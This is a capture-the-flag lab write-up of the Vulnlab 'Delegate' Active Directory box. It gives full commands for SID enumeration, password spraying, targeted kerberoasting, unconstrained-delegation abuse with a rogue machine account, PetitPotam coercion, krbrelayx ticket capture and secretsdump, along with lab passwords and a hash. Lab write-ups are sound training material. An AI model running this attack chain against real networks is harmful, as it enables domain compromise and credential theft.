# Vulnlab - Delegate ```bash Host is up (0.22s latency). Not shown: 65522 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec 135/tcp open msrpc Microsoft Windows RPC 139/tcp open tcpwrapped 445/tcp open tcpwrapped 464/tcp open tcpwrapped 3389/tcp open tcpwrapped | ssl-cert: Subject: commonName=DC1.delegate.vl | Issuer: commonName=DC1.delegate.vl | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2023-09-30T15:47:02 | Not valid after: 2024-03-31T15:47:02 | MD5: 3a340b861cd985281f509d995bef9f4a |_SHA-1: ccc740dd30a643bfc26e0b7f5d018da28d7e1630 5985/tcp open 9389/tcp open tcpwrapped 47001/tcp open tcpwrapped 49667/tcp open tcpwrapped 49669/tcp open tcpwrapped 49670/tcp open tcpwrapped 49686/tcp open tcpwrapped 49691/tcp open tcpwrapped ``` Enumerating smb with anonymous user doesn't show any intereting shares We can however enumerate domain users with `lookupsid` using a guest account by brute forcing SIDs ```bash lookupsid.py guest@delegate.vl 10000 ``` Having the domain users, we can check if there's any account having pre-authentication disabled which can lead to AS-REP roasting Checking the shares and accessing `SYSVOL` share, we can find `users.bat` file having a password Spraying this password on the users we have confirms that this password belongs `A.Briggs` Running `python-bloodhound` to enumerate the domain ```bash python3 bloodhound.py -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123' -c all -ns ``` From bloodhound we can see `A.Briggs` has `GenericWrite` on `N.thompson` This can abuse either through `Shadow credentials` or associating a SPN to N.Thompson for `Targeted kerberoasting`, I tried with shadow credentials by editing `msDS-KeyCredentialLink` but due to PKINT notbeing supported by this DC it didn't worked Attempting to perfrom targeted kerberoasting ```bash python3 /opt/targetedKerberoast/targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl' ``` Cracking the hash with hashcat Since n.thompson has `CanPSRemote` we can login through WinRM This user belongs to `Delegation Admins` but there wasn't ACLs on bloodhound for that group Checking privileges of this user shows that it has `SeEnableDelegationPrivilege` enabled This means that we can abuse unconstrained delegation by creating machine account and append a SPN to it, before that we need to make sure if machine quota isn't 0 First creating a machine account with `addcomputer.py` ```bash addcomputer.py -dc-ip -computer-pass TestPassword321 -computer-name UwU delegate.vl/N.Thompson:'KALEB_2341' ``` Adding dns record for the machine account we created ```bash python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d --action add DC1.delegate.vl -dns-ip ``` Adding a DNS entry for this machine account with `dnstool` ``` python3 dnstool.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -r UwU.delegate.vl -d --action add DC1.delegate.vl -dns-ip ``` To abuse unconstrained delegation the machine needs to have a SPN and `TRUSTED_FOR_DELEGATION` UAC, using `bloodyAD` we can add the UAC ```bash python3 /opt/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION ``` Appending SPN with `addspn` via `msDS-AdditionalDnsHostName` ```bash python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip DC1.delegate.vl --additional python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip DC1.delegate.vl ``` Now running `krbrelayx` by first coercing authentication (using any poc i.e petipotam, printerbug, dfscoerce ) from DC1 to our added machine with unconstrained delegation enabled, this will grab the copy of DC1's TGT which gets stored in the memory of machine account having trusted for delegation enabled for the purpose of accessing resources ```bash python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl ``` And running krbrelayx with NThash of the machine account ```bash python3 ./krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC ``` Having the ticket, we can export it and dump the hashes with `secretsdump` ```bash secretsdump.py 'DC1$'@DC1.delegate.vl -k -no-pass ``` # References - https://www.thehacker.recipes/a-d/movement/dacl/targeted-kerberoasting - https://exploit.ph/user-constrained-delegation.html - https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/ - https://github.com/CravateRouge/bloodyAD - https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203